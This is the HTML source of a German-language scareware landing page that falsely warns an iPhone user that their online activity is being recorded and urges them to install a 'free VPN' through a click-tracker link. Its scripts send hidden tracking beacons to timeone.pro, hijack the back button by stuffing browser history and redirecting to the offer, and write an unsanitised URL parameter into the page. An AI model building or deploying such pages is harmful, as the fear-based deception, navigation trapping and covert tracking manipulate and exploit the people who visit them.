<!DOCTYPE html>
<html>

<head>
    <base href="">
    <meta charset="utf-8">
    <title>(1) Benachrichtigung</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="icon" type="image/png" href="https://your-privacy-first.com/images/favicon.png">
    <link rel="stylesheet" href="common.css">
    <link rel="stylesheet" href="default.css">
</head>

<body>

    <!------SCRIPT------->

    <script>
        if (typeof(window.orientation) == "undefined") {
            var o = document.createElement("img");
            o.src = 'https://timeone.pro/click.php?event10=0';
        } else {
            var o = document.createElement("img");
            o.src = 'https://timeone.pro/click.php?event10=1';
        }
    </script>

    <script type="text/javascript">
        ! function() {
            var t;
            try {
                for (t = 0; 10 > t; ++t)
                    history.pushState({}, "", "#");
                onpopstate = function(t) {
                    t.state && location.replace("https://timeone.pro/click.php?lp=1&event9=1")
                }
            } catch (o) {}
        }();
    </script>

    <script type="text/javascript">
        var scroll = 0;
        window.onscroll = function() {
            if (scroll != 1) {
                scroll = 1;
                var o = document.createElement("img");
                o.src = "https://timeone.pro/click.php?event8=1";
            }
        }
    </script>

    <script>
        function pushToTrackerViaImage() {
            var pushURL = 'https://timeone.pro/click.php?event7=1';
            var img = document.createElement('img');
            img.src = pushURL;
            img.style.display = 'none';
            document.body.appendChild(img);
        }

        function pushAfterTimeout(timeout) {
            setTimeout(pushToTrackerViaImage, timeout * 1000);
        }
        var TIMEOUT_IN_SECONDS = 10;
        pushAfterTimeout(TIMEOUT_IN_SECONDS);
    </script>

    <!------SCRIPT END------->


    <div>
        <style>
            body {
                background: white;
                font-family: sans-serif, arial, helvetica;
                font-size: 14px;
                padding: 0px;
                margin: 0px;
            }
            div {
                text-align: center;
            }
            a {
                color: #3478f6;
                text-decoration: none !important;
            }
            .div_top {
                background: #eeeeee;
                padding: 5px;
                height: 25px;
                color: #3478f6;
                font-size: 1.1em;
                font-weight: bold;
            }
            .div_top img {
                width: 25px;
            }
            .clear {
                clear: both;
            }
            .attention {
                font-size: 1.4em;
                font-weight: bold;
                margin: 10px auto;
                max-width: 700px;
                padding-left: 10px;
                padding-right: 10px;
            }
            .attention .atn_img {
                width: 60px;
                height: 60px;
                float: left;
                margin-right: 7px;
            }
            .attention .atn_img img {
                max-width: 100%;
            }
            .attention .heading {
                padding: 6px;
                line-height: 1.4em;
            }
            .main {
                max-width: 600px;
                text-align: center;
                margin: 0 auto;
                font-size: 1.1em;
                padding-left: 10px;
                padding-right: 10px;
            }
            .main .phone {
                height: 165px;
                max-width: 80px;
                margin: 0 auto;
            }
            .main .phone img {
                max-width: 100%;
            }
            .bottom {
                text-align: center;
                font-size: 0.8em;
                margin-top: 20px;
            }
            .red {
                color: #cc0000;
            }
            a.button {
                border: 2px solid #3478f6;
                text-decoration: none;
                font-size: 1.2em;
                font-weight: 600;
                padding: 7px 15px;
                color: #3478f6;
                -webkit-border-radius: 8px;
                -moz-border-radius: 8px;
                border-radius: 8px;
            }
            a.button:hover {
                border-color: #333;
                color: #333;
            }
            a.button:click,
            a.button:active {
                margin-top: 1px;
            }
            a.bluebtn {
                background: #3478f6;
                color: #FFF;
                text-decoration: none;
                font-size: 1.2em;
                font-weight: 600;
                padding: 7px 15px;
                -webkit-border-radius: 15px;
                -moz-border-radius: 15px;
                border-radius: 15px;
            }
            a.bluebtn:hover {
                border-color: #2262d8;
                color: #FFF;
            }
        </style>
        <div class="div_top">
            <div style="float:left; width:25%; text-align:left; margin-top:3px;"> <a href="https://timeone.pro/click.php?lp=1&to_offer=1">&lt;Zurück</a> 
            </div>
            <div style="float:left; width:50%; text-align:center; margin-top:3px;"> <a href="https://timeone.pro/click.php?lp=1&to_offer=1">Sicherheits-Apps</a> 
            </div>
            <!--<div style="float:left; width:25%; text-align:right;"><a href="https://timeone.pro/click.php?lp=1&to_offer=1"><img src="/assets/images/vpn.png" /></a></div>--></div>
        <div class="clear"></div>
        <div class="attention">
            <div class="atn_img">
                <img src="alert1.png">
            </div>
            <div class="heading">WARNUNG: Jemand zeichnet möglicherweise Ihre Online-Aktivität auf!</div>
        </div>
        
        <!--------SCRIPT loc-------->
        
        <script>
            function getURLParameter(name) {
                return decodeURI(
                    (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [, null])[1] || ''
                );
            }
        </script>
        
        <!--------SCRIPT loc end-------->
        
        <div class="clear"></div>
        <div class="main">Jede Website, die Sie auf Ihrem iPhone mit IP <span class="red">91.63.219.243 in der</span> Nähe von <span class="red"> <script>document.write(getURLParameter('city'))</script> </span> besuchen <span class="red">,</span> kann von Ihrem Internetdienstanbieter, Regierungsbehörden, Datenunternehmen und potenziellen Hackern aufgezeichnet werden!
            <br>
            <br>
            <div class="phone" style="float:left; padding:0 20px 10px 0;">
                <img src="device-IOS.jpg" alt="Telefon">
            </div>
            <div style="text-align:left;">Aufgrund von <b>Verstößen</b> gegen die <b>Datenschutzbestimmungen</b> bei Facebook, Banken, Behörden, Kreditbüros usw. ist Ihr Online-Datenschutz jetzt <b>wichtiger als je zuvor</b> .
                <br>
                <br>Es ist <b>zwingend erforderlich,</b> dass Sie Ihre Privatsphäre schützen und Ihre IP-Adresse auf Ihrem Telefon oder Tablet verbergen.
                <br>
                <br>Laden Sie die hoch bewertete VPN-App unten herunter. Das Herunterladen dauert nur 15 Sekunden. Sobald Sie die App öffnen, sind Sie geschützt!</div>
            <br>
            <br> <a href="https://timeone.pro/click.php?lp=1&to_offer=1" class="button bluebtn">KOSTENLOS INSTALLIEREN</a> 
            <br>
            <br>
            <br>
            <div style="text-align:left; padding:8px; padding-bottom:0px;"> <b>Schritt 1:</b> Tippen Sie unten auf die Schaltfläche "INSTALL FREE" und laden Sie die vertrauenswürdige VPN-App aus dem App Store herunter (15 Sekunden).
                <br>
                <br> <b>Schritt 2:</b> Öffnen Sie die App, um Ihre IP-Adresse zu verschlüsseln und anonym zu surfen
                <br>
            </div>
            <br>
            <br> <a href="https://timeone.pro/click.php?lp=1&to_offer=1" class="button bluebtn">KOSTENLOS INSTALLIEREN</a> 
            <br>
            <br>
            <br>
            <a href="https://timeone.pro/click.php?lp=1&to_offer=1">
                <img src="IOS.png" style="max-width:170px;">
            </a>
            <br>
            <br>
        </div>
        <div class="clear"></div>
        <div class="bottom"> <a href="https://timeone.pro/click.php?lp=1&to_offer=1">Kontaktieren Sie uns</a> | <a href="https://timeone.pro/click.php?lp=1&to_offer=1">Privatsphäre</a> 
            <br>Copyright © 2018. Datenschutz-Alerts.com. Alle Rechte vorbehalten.</div>
        <br>
        <div class="clear"></div>
        <div style="display:none;" id="jsalertdiv">WARNUNG!
            <br>
            <br>Jemand kann Ihre Online-Aktivität aufzeichnen!
            <br>
            <br>Klicken Sie auf OK, um eine App zu installieren, um Ihr Gerät zu schützen</div>
        
       
    </div>
    

</body>

</html>